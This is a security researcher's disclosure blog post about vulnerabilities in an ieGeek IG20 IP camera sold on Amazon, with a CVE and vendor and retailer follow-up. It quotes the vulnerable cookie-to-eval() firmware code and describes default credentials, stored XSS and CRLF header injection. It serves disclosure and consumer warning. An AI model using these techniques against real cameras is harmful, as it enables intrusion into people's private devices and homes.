When the camera is booted up, a web server is spawned and requires a login to gain access. Default credentials were then used to gain access and there was no setup to force change of the default password in place. Burpsuite caught this login process; the session was found to be using HTTP Basic Authentication to handle the username and password. The Base64 translates to admin:admin.

**JavaScript injection (DOM-based) CWE-79**

Data is read from **document.cookie** and passed to **eval()**

    
    var strCookie=document.cookie;
    var arrCookie=strCookie.split('; ');
    var arr=arrCookie[i].split('=');
    return unescape(arr[1]);
    var cooktype=getcookie('cookmun');
    var string = eval("'cgi-bin/hi3510/param.cgi?cmd=setimageattr&-image_type="+cooktype+"&-default=on'");

Using various different methods of escaping. Stored XSS was also prevalent in many places within the admin panel that used user input. Example: FTP Upload settings.

**HTTP Response Header Injection/Splitting CWE-644**

The web application is also evidently vulnerable to HTTP response header injection, see PoC below. This also led me to discover i was able to break out of the response.

Your options for exploitation vary depending on the type of response you’re injected into and also where in the response you’re placed!

Here we’ve added a “malicious cookie” which will be set in the browser. As mentioned earlier i was also able to break into the body, or out of the headers through double CRLFs (%0d%0a%0d%0a) **_see below_**.

When user input is insecurely inserted into the headers of server responses, HTTP Header Injection vulnerabilities are created. They are based on the theory that an attacker can make the server generate a response that contains carriage-return and line-feed characters (or, respectively, %0D and %0A in their URI encoded forms), within the server response header, and/or that the attacker may be able to add specially created headers. Attacks like response splitting, session fixation, cross-site scripting, and malicious redirection are all possible using header injection.

Often, the injection of headers is not the main attack; rather, it is merely a method for accessing or exploiting another flaw. For instance, if a hacker is able to inject a payload through HTTP header injection, they may target a website that is susceptible to cross-site scripting in the Referer header or in a cookie value etc.

**Device NMAP scan**

    Starting Nmap 7.80 ( https://nmap.org ) at 2022-08-28 00:42 BST
    Nmap scan report for 192.168.1.116
    Host is up (0.0088s latency).
    Not shown: 996 closed ports
    PORT     STATE SERVICE
    80/tcp   open  http Hipcam RealServer/V1.0
    554/tcp  open  rtsp
    1935/tcp open  rtmp Real-Time Messaging Protocol
    8080/tcp open  http-proxy ONVIFservice
    MAC X (Shenzhentong BO Weitechnology) SHENZHEN TONG BO WEI TECHNOLOGY Co.,LTD
    Device type: general purpose
    Running: Linux 2.6.X|3.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
    OS details: Linux 2.6.32 - 3.10
    Network Distance: 1 hop
     

Anyway, I decided enough is enough with this trash device and unplugged it from my network, packaged it back up and arranged a return with Amazon.

**The Listing On Amazon**

At the time of writing, the listing is still available, however, I reached out to Amazon and made them fully aware of everything, including my intention to publish this article, and they advised me that the product listing would be “temporarily” removed today, **28th Aug 2022**, pending further Investigation.  
The listing can be seen here **_\[if still available\]_**

It has to be worth noting, that there was an investigation by Which.co.uk see reference \[3\] in July 2021, that details a line of similar flaws, consequently, Amazon removed the said ieGeek branded camera from sale on its website. The which? investigation revealed another device from the same manufacturer can be easily hacked by cybercriminals.

> The £40 camera, which was labelled Amazon’s Choice, had more than 8,500 reviews (as of June 22 2021), including 68% giving the full five stars.
> 
> If you own the ieGeek Security Outdoor Camera 1080p, you should change its default password immediately, or better still, stop using it.
> 
> https://www.which.co.uk/news/article/iegeek-security-camera-removed-from-sale-following-which-investigation-ajW4t0g7bnGj

So the question remains, why do Amazon allow Manufacturers to list products irrelevant of the manufacturer having been Flagged, and Delisted in the past? A better system needs to be in place. Yes, I understand there can be a new line of products/models but surely amazon should be seen to be doing more to prevent devices like this from appearing on their website. The privacy and security of their customers should be paramount.

**Update 01 Sep 2022 – Product Still Listed On Amazon**

We’ve noted that the product is still available to purchase on Amazon, despite us being told that it would be removed, pending an investigation. We figured we’d add a screenshot, just for clarity.

Here is the screenshot of a mail I received from the Amazon Representative on the 28th of August, this email states the item “may be temporarily unavailable”, which contradicts what she told me on the telephone. This email arrived in my mailbox very shortly after I had a call with the same lady, Roxy.

**Update: 01 Sep 2022**

We’ve been made aware of another article from Which.co.uk, this second article was published in late 2021, after the earlier-mentioned article. Their second write-up clearly paints a very different picture, one could easily say it’s misleading given what has been uncovered in this report. It has to be worth mentioning that my ieGeek device, and probably many many others, was still running the same vulnerability-ridden firmware that Which.co.uk spoke out against in their first write-up, as has been verified by the team here at risec and elsewhere. There was no obvious offer of any firmware upgrade, at least to my knowledge. Anyway, see some quotes from the second write-up below.

> **Millions of CamHi wireless cameras made more secure after hacking risk**
> 
> Following a change by HiChip, all CamHi app devices when installed now must have their default password changed by the user.
> 
> HiChip has agreed to enforce a strong password policy, particularly blocking generic terms such as ‘password’ and ‘admin’.
> 
> For CamHi devices that are already set up in people’s homes, the app will remind them to change the default password and warn them if what they have chosen is weak
> 
> **_MISLEADING_**: https://www.which.co.uk/news/article/millions-of-camhi-wireless-cameras-made-more-secure-after-hacking-risk-aezzW2u2ELsl

**_We have reached out to Which.co.uk and have yet to receive any notable response._**

**Consumer Recommendations**

If you value your privacy, and security as much as we do, please remove the device from service. It is simply unfit for purpose. If you bought it from Amazon, go and arrange a return as this device is in clear breach of their merchant conditions.

Research each device thoroughly before buying, and check it’s security reputation.

_**Be Aware**_**_:_** _Endless numbers of IP cameras of other Brands also use the Hipcam RealServer service; I am unable to check the configuration of these devices specifically, but one would be led to believe they are all implemented similarly. Sadly, there doesn’t seem to be a method to warn anyone utilising these IP Cameras that they are exposed._

On a final note, take amazon’s reviews with a pinch of salt, and always do your homework. Next time your about to purchase a connected device, IoT(Internet-of-Things), do a quick google query, something like, “vulnerable BRAND” or “exploit BRAND”

**Q&A****Are ieGeek cameras secure?**

According to our research, and many others, ieGeek cameras are not secure. The devices they seem to be pushing out in 2022 are vulnerable in a number of ways as detailed in this article. Fundamentally, they lack proper encryption, and, are shipped to consumers riddled with security holes. One can only ask themselves, is it intentional? _**tldr; Given the research of the team here at RiSec, and research conducted elsewhere, we can categorically say ieGeek’s cameras are not secure in 2022.**_

**What are the real risks of ieGeek cameras?**

By using these devices that lack proper safety and security standards, your private data is at serious risk of being exposed, **a bad actor may able to gain complete control of the cameras**. This fundamentally opens up your entire network to further attack, making it much easier for a bad actor to reach an end goal.

Cheap CCTV cameras tend to be vulnerable to at least one of the following types of hacking:

1.  They have a weak default password and username setting, which can be easily discoverable. If the user doesn’t change those settings, it’s very easy for hackers to find their way into your camera control system, in every case, there is no prompt in the Admin panel when logging in, advising you to chase any password.
2.  They don’t encrypt your data so that your home router password input is un-encrypted and accessible to any cyber attacker, or themselves.., same applies with any SMTP email info provided, along with any FTP info provided to the device. By using the home router password, they can gain access to other devices on your home network, can monitor your Internet history and any stored data on connected devices.
3.  They let external users gain root access to the device itself, allowing hackers to take control, launch attacks from your device, and exfiltrate data.

**Cheap CCTV Invites Outside Threats Into Your Home\[4\]**

> There are three main security issues you need to look for when buying your CCTV camera. Popular wireless security camera brands that are sold on online marketplaces like Amazon, but also eBay share common security flaws.
> 
> As a rule of thumb, brands that are not well-known outside of the online market should be avoided at all cost. Affordable CCTV solutions from Shenzhen-based factories in China sometimes fail to meet wireless safety standards.
> 
> Brands that have been tested for vulnerability and that you should avoid are the following; ieGeek, Sricam, SV3C, and Vstarcam. All come with a friendly price tag, but they are quick to join the list of CCTV cameras that put your privacy and security at risk.
> 
> Tested by a professional security lab, Context Information Security, “cheap CCTV cameras show that they fail to prioritise customers’ security even those that are bestsellers in online marketplaces”
> 
> \[4\]

Update: **_21/09/2022_** – After some back-and-forth correspondence with the vendor, **_ieGeek_**, they have disputed that the ieGeek IG20 is an insecure device, despite our evidence to the contrary, they also cited an invalid misleading Which.co.uk\[5\] post as seen above.

**CVE Approved:** **_CVE-2022-38970_**\[6\]

**_Got some crazy story? thoughts on this article? We’d love to hear from you below!_**

_Coming up next, I will be covering a Chinese “Mini-PC” that was shipped to me loaded with Malware._

Ciao, for now.

**_References_**

Amazon product listing\[1\]

IG20 ieGeek store page\[2\]

Which investigation ieGeek\[3\]

Cheap CCTV Sold With Known Vulnerabilities\[4\]

Which.co.uk Misleading\[5\]

**_CVE-2022-38970_**\[6\]

Suggest an edit to this article

Go to Cybersecurity Knowledge Base

Got to the Latest Cybersecurity News

Go to Cybersecurity Academy

Go to Homepage

_Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today_.

**_Remember,_** _CyberSecurity Starts With You!_

*   Globally, **30,000 websites** are hacked daily.
*   **64% of companies** worldwide have experienced at least one form of a cyber attack.
*   There were **20M breached records** in March 2021.
*   In 2020, ransomware cases grew by **150%**.
*   Email is responsible for around **94% of all malware**.
*   **Every 39 seconds,** there is a new attack somewhere on the web.
*   An average of **around 24,000 malicious mobile apps** are blocked daily on the internet.

Bookmark

**Please login to bookmark**

No account yet? Register

*   About
*   Latest Posts

Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK.

I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated...

I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK.

I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

Share the word, let's increase Cybersecurity Awareness as we know it

CVE-2022-38970: ieGeek Vulnerabilities still prevalent in 2022 - Amazon Ft. IG20

Tenda i9 v1.0.0.8(3828) was discovered to contain a buffer overflow via the formWifiMacFilterSet function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

CVE-2022-40101

Tenda i9 v1.0.0.8(3828) was discovered to contain a buffer overflow via the formWifiMacFilterGet function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Tag

#wifi